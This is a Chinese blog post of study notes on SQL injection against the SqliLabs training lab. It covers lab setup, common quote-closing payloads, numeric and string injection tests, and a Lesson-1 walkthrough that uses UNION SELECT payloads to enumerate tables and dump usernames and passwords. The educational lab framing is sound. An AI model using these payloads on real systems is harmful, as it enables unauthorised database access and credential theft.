<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>第13天学习笔记 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <meta name="description" content="sql注入sqli靶场SqliLabs 是一个学习 SQL 注入的靶场，它提供了 GET 和 POST 的实验场景，涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。 环境配置1靶场地址：https:&#x2F;&#x2F;github.com&#x2F;Audi-1&#x2F;sqli-labs  在 Windows 下使用 phpstudy 搭建靶场环境，将靶场放置到其 web">
<meta property="og:type" content="article">
<meta property="og:title" content="第13天学习笔记">
<meta property="og:url" content="http://example.com/2023/11/24/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-13/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="sql注入sqli靶场SqliLabs 是一个学习 SQL 注入的靶场，它提供了 GET 和 POST 的实验场景，涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。 环境配置1靶场地址：https:&#x2F;&#x2F;github.com&#x2F;Audi-1&#x2F;sqli-labs  在 Windows 下使用 phpstudy 搭建靶场环境，将靶场放置到其 web">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img4cff441c2188cecd181cacc613472b80.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgaba89b8111affbe9ce41b80d6e386632.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgimage-20231126184717334.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img8d8a00f1060c5e4139ef87e79ac26c49.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img905bd2307f1f6679aae904c6bff75fd7.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imga837159b7d2d212e787de89fd6a0b41f.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img35bc55c2ab56ae911bc3a80215aa164b.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgfffd0f3ab11e1cdce51a71288ed8bbb0.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img7bda611cdcc2ef14221b412bb254f30e.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img0ba111155aac73e0b5a79642d8b3e3c2.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgf05aa7ebad1cfb9db12562f5b2b34f29.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img85232fdf23735d6b5397ae4814b2ceb2.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imge78ac3171b37150b7ad00274dca7896d.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgff64d8a827ad034ceb2f5346ee55343c.png">
<meta property="article:published_time" content="2023-11-24T09:30:22.000Z">
<meta property="article:modified_time" content="2023-11-26T11:00:24.608Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img4cff441c2188cecd181cacc613472b80.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/3.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/css/highlight.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="fullpage" class="mobile-nav-right">
    
      <div id="wrapper" style="background-image: url(/images/13.jpg)" title="图片来自网络">
    
    
      <header id="header">
  <div id="nav-toggle" class="nav-toggle"></div>
  <div class="head-box global-width">
    <nav class="nav-box nav-right">
      
        <a class="nav-item" href="/" title
        
        >首页</a>
      
        <a class="nav-item" href="/archives" title
        
        >归档</a>
      
    </nav>
  </div>
</header>
      <div id="middlecontent" title class="global-width sidebar-right">
        <section id="main"><article id="post-我的博客-13" class="article global-container article-type-post" itemscope itemprop="blogPost">
  
    <header class="article-header">
      
  
    <h1 class="article-title" itemprop="name">
      第13天学习笔记
    </h1>
  

    </header>
  
  <div class="article-meta">
    <a href="/2023/11/24/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-13/" class="article-date">
  <time datetime="2023-11-24T09:30:22.000Z" itemprop="datePublished">2023-11-24</time>
</a>
    
    
  </div>
  
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
  

  <div class="article-inner">
    
    <div class="article-content article-content-cloud" itemprop="articleBody">
      
        <h2 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h2><h3 id="sqli靶场"><a href="#sqli靶场" class="headerlink" title="sqli靶场"></a>sqli靶场</h3><p>SqliLabs 是一个学习 SQL 注入的靶场，它提供了 GET 和 POST 的实验场景，涵盖了<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2&spm=1001.2101.3001.7020">联合查询</a>注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。</p>
<h4 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a><strong>环境配置</strong></h4><div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶场地址：https://github.com/Audi-1/sqli-labs</span><br></pre></td></tr></table></figure></div>

<p>在 Windows 下使用 phpstudy 搭建靶场环境，将靶场放置到其 web 环境当中。</p>
<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img4cff441c2188cecd181cacc613472b80.png" alt="img"></p>
<p>成功访问说明靶场已经部署完成，接下来需要配置数据库连接</p>
<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgaba89b8111affbe9ce41b80d6e386632.png" alt="img"></p>
<p>在&#x2F;sql-connections目录下存在db-creds.inc数据库连接配置文件，设置数据库账号密码以及对应地址</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$dbuser =&#x27;root&#x27;;$dbpass =&#x27;root&#x27;;$dbname =&quot;security&quot;;$host = &#x27;localhost&#x27;;$dbname1 = &quot;challenges&quot;;</span><br></pre></td></tr></table></figure></div>

<p>完成后访问靶场，点击<code>setup databases for labs</code>搭建数据库环境</p>
<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgimage-20231126184717334.png" alt="image-20231126184717334"></p>
<h3 id="常见的几个闭合方式"><a href="#常见的几个闭合方式" class="headerlink" title="常见的几个闭合方式"></a>常见的几个闭合方式</h3><div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">常见的几个闭合方式：</span><br><span class="line">or 1=1 -- +</span><br><span class="line">&#x27;or 1=1 -- +            </span><br><span class="line">&quot;or 1=1 -- +</span><br><span class="line">)or 1=1 -- +</span><br><span class="line">&quot;)or 1=1 -- +</span><br><span class="line">&quot;))or 1=1 -- +</span><br><span class="line">用闭合的是数字型注入方式，不用闭合的是字符型注入方式</span><br><span class="line">union联合注入：</span><br><span class="line">sql union语法：</span><br><span class="line">select column name(s) from table_name1</span><br><span class="line">union</span><br><span class="line">select column name(s) from table_name2</span><br><span class="line">常用的sql注入查询函数：</span><br><span class="line">database()                数据库的名</span><br><span class="line">version()                 mysql的版本信息</span><br><span class="line">user()                    数据库的用户名</span><br><span class="line">@@datadir                 数据库路径</span><br><span class="line">@@version_compile_os      操作系统的版本</span><br><span class="line">select schema_name from information_schema.schemata    查库</span><br><span class="line">select table_name from information_schema.tables where table_schema=&#x27;security&#x27;   查表</span><br><span class="line">select column_name from information_schema.columns where table_name=&#x27;users&#x27;      查列</span><br><span class="line">select username,password from security.users           查字段</span><br><span class="line">select table_schema,table_name from information_chema.tables where table_schema=&#x27;数据库名&#x27;;</span><br><span class="line">table_schema是查询数据库名称(该字段存储数据库名)</span><br><span class="line">table_name是查询表名(该字段存储对应数据库中的包括的表名)</span><br><span class="line">from information_chema是从这个数据库里来查询tables这个表</span><br></pre></td></tr></table></figure></div>

<h4 id="注入的分类"><a href="#注入的分类" class="headerlink" title="注入的分类"></a>注入的分类</h4><div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">数字型和字符型。攻击者目的只有一点，那就是绕过程序的限制，使用户输入的数据带入数据库执行，利用数据库的特殊性获取更多的信息或者更大的权限。</span><br><span class="line">1、数字型注入</span><br><span class="line">当输入的参数为整形时，如果存在注入漏洞，可以认为是数字型注入。</span><br><span class="line">测试步骤：</span><br><span class="line">（1） 加单引号，URL：www.text.com/text.php?id=3’</span><br><span class="line">对应的sql：select</span><br><span class="line">* from table where id=3’ 这时sql语句出错，程序无法正常从数据库中查询出数据，就会抛出异常；</span><br><span class="line">（2） 加and 1=1</span><br><span class="line">,URL：www.text.com/text.php?id=3 and 1=1</span><br><span class="line">对应的sql：select</span><br><span class="line">* from table where id=3’ and 1=1 语句执行正常，与原始页面如任何差异；</span><br><span class="line">（3） 加and 1=2，URL：www.text.com/text.php?id=3 and 1=2</span><br><span class="line">对应的sql：select</span><br><span class="line">* from table where id=3 and 1=2 语句可以正常执行，但是无法查询出结果，所以返回数据与原始网页存在差异</span><br><span class="line">如果满足以上三点，则可以判断该URL存在数字型注入。</span><br><span class="line">2、字符型注入</span><br><span class="line">当输入的参数为字符串时，称为字符型。字符型和数字型最大的一个区别在于，数字型不需要单引号来闭合，而字符串一般需要通过单引号来闭合的。</span><br><span class="line">例如数字型语句：select * from table where id</span><br><span class="line">=3</span><br><span class="line">则字符型如下：select * from table where</span><br><span class="line">name=’admin’</span><br><span class="line">因此，在构造payload时通过闭合单引号可以成功执行语句：</span><br><span class="line">测试步骤：</span><br><span class="line">（1） 加单引号：select</span><br><span class="line">* from table where name=’admin’’</span><br><span class="line">由于加单引号后变成三个单引号，则无法执行，程序会报错；</span><br><span class="line">（2） 加 ’and</span><br><span class="line">1=1 此时sql 语句为：select * from</span><br><span class="line">table where name=’admin’ and 1=1’ ,也无法进行注入，还需要通过注释符号将其绕过；</span><br><span class="line">Mysql 有三种常用注释符：</span><br><span class="line">-- 注意，这种注释符后边有一个空格</span><br><span class="line"># 通过#进行注释</span><br><span class="line">/* */ 注释掉符号内的内容</span><br><span class="line">因此，构造语句为：select * from table where</span><br><span class="line">name =’admin’ and 1=1—’ 可成功执行返回结果正确；</span><br><span class="line">（3） 加and</span><br><span class="line">1=2— 此时sql语句为：select * from</span><br><span class="line">table where name=’admin’ and 1=2 –’则会报错</span><br><span class="line">如果满足以上三点，可以判断该url为字符型注入。</span><br><span class="line">Sql注入分类可以按照参数类型分为数字型和字符型。还有一些常见的注入分类，例如：</span><br><span class="line">（1）POST：注入字段位于POST数据中；</span><br><span class="line">（2）Cookie：注入字段位于Cookie数据中；</span><br><span class="line">（3）延时注入：根据数据库延时特性的注入</span><br><span class="line">（4）搜索注入：注入字段在搜索的位置；</span><br><span class="line">（5）base64注入：注入字符经过base64编码后注入；</span><br><span class="line">（7）错误注入：基于数据库错误信息的响应注入；</span><br></pre></td></tr></table></figure></div>

<h3 id="Lesson-1"><a href="#Lesson-1" class="headerlink" title="Lesson-1"></a>Lesson-1</h3><p>该题为单引号get型注入，利用方式包括联合查询注入、报错注入、布尔盲注、时间盲注</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&#x27;</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img8d8a00f1060c5e4139ef87e79ac26c49.png" alt="img"></p>
<p>目标SQL语句如下：</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$sql = select * from users where id=&#x27;$id&#x27; limit 0,1</span><br><span class="line">## 返回内容</span><br><span class="line">if true:</span><br><span class="line">    输出查询内容</span><br><span class="line">else:</span><br><span class="line">    print_r(mysql_error());$sql = select * from users where id=&#x27;$id&#x27; limit 0,1## 返回内容if true:    输出查询内容else:    print_r(mysql_error());</span><br></pre></td></tr></table></figure></div>

<ul>
<li><p>通过联合查询判断注入点，尝试验证</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&#x27; AND &#x27;1&#x27;=&#x27;1 //返回正常界面</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img905bd2307f1f6679aae904c6bff75fd7.png" alt="img"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&#x27; AND &#x27;1&#x27;=&#x27;2 //返回错误界面</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imga837159b7d2d212e787de89fd6a0b41f.png" alt="img"></p>
</li>
<li><p>使用 order by 判断字段数</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&#x27; order by 3--+ //返回正常界面</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img35bc55c2ab56ae911bc3a80215aa164b.png" alt="img"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&#x27; order by 4--+ //返回错误界面</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgfffd0f3ab11e1cdce51a71288ed8bbb0.png" alt="img"></p>
</li>
<li><p>由此可说明字段数为3，通过 union select 查看回显位置</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,2,3--+</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img7bda611cdcc2ef14221b412bb254f30e.png" alt="img"></p>
</li>
<li><p>查询基础信息</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,version(),user()--+</span><br><span class="line">id=-1&#x27; union select 1,@@version_compile_os()，database()--+</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img0ba111155aac73e0b5a79642d8b3e3c2.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgf05aa7ebad1cfb9db12562f5b2b34f29.png" alt="img"></p>
</li>
<li><p>查询表名</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = &#x27;security&#x27;--+</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//img85232fdf23735d6b5397ae4814b2ceb2.png" alt="img"></p>
</li>
<li><p>查询列名</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_name = &#x27;users&#x27;--+</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imge78ac3171b37150b7ad00274dca7896d.png" alt="img"></p>
</li>
<li><p>查询关键信息</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAINTEXT"><figure class="iseeu highlight /plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=-1&#x27; union select 1,group_concat(username),group_concat(password) from users--+</span><br></pre></td></tr></table></figure></div>

<p><img src="https://cdn.jsdelivr.net/gh/lyfzlylc/image@main//imgff64d8a827ad034ceb2f5346ee55343c.png" alt="img"></p>
</li>
</ul>

      
    </div>
    
      <footer class="article-footer">
        完
      </footer>
    
  </div>
  
    
<nav id="article-nav">
  <div class="article-nav-block">
    
  </div>
  <div class="article-nav-block">
    
      <a href="/2023/11/23/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-12/" id="article-nav-older" class="article-nav-link-wrap">
        <div class="article-nav-title">第12天学习笔记</div>
        <strong class="article-nav-caption"></strong>
      </a>
    
  </div>
</nav>

    <link rel="stylesheet" href="/css/gitment.css"> 
<script src="/js/gitment.js"></script>

<div id="gitmentContainer"></div>

<script>
var gitment = new Gitment({
  owner: '',
  repo: '',
  oauth: {
    client_id: '',
    client_secret: '',
  },
})
gitment.render('gitmentContainer')
</script>

  
  
</article>
</section>
        <aside id="sidebar">
  
    <div class="widget-box">
  <div class="avatar-box">
    <img class="avatar" src="/images/3.png" title="图片来自网络"></img>
    <h3 class="avatar-name">
      
        volcano
      
    </h3>
    <p class="avatar-slogan">
      长风破浪会有时 直挂云帆济沧海
    </p>
  </div>
</div>


  
    

  
    

  
    
  
    
  <div class="widget-box">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/11/">November 2023</a></li></ul>
    </div>
  </div>

  
    
  <div class="widget-box">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/11/24/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-13/">第13天学习笔记</a>
          </li>
        
          <li>
            <a href="/2023/11/23/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-12/">第12天学习笔记</a>
          </li>
        
          <li>
            <a href="/2023/11/22/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-11/">第11天学习笔记</a>
          </li>
        
          <li>
            <a href="/2023/11/21/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-10/">第10天学习笔记</a>
          </li>
        
          <li>
            <a href="/2023/11/20/%E6%88%91%E7%9A%84%E5%8D%9A%E5%AE%A2-9/">第9天学习笔记</a>
          </li>
        
      </ul>
    </div>
  </div>

  
      <div class="widget-box">
    <h3 class="widget-title">友链</h3>
    <div class="widget">
      
        <a style="display: block;" href="https://yiluyanxia.github.io/" title target='_blank'
        >一路眼瞎</a>
      
    </div>
  </div>

  
</aside>
      </div>
      <footer id="footer">
  <div class="foot-box global-width">
    &copy; 2023 John Doe &nbsp;&nbsp;
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    &nbsp;|&nbsp;主题 <a target="_blank" rel="noopener" href="https://github.com/yiluyanxia/hexo-theme-antiquity">antiquity</a>
    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">不蒜子告之   阁下是第<span id="busuanzi_value_site_pv"></span>个访客</span>
  </div>
</footer>
      <script src="https://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
if (!window.jQuery) {
var script = document.createElement('script');
script.src = "/js/jquery-2.0.3.min.js";
document.body.write(script);
}
</script>

  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




    </div>
    <nav id="mobile-nav" class="mobile-nav-box">
  <div class="mobile-nav-img mobile-nav-top"></div>
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
  <div class="mobile-nav-img  mobile-nav-bottom"></div>
</nav>    
  </div>
</body>
</html>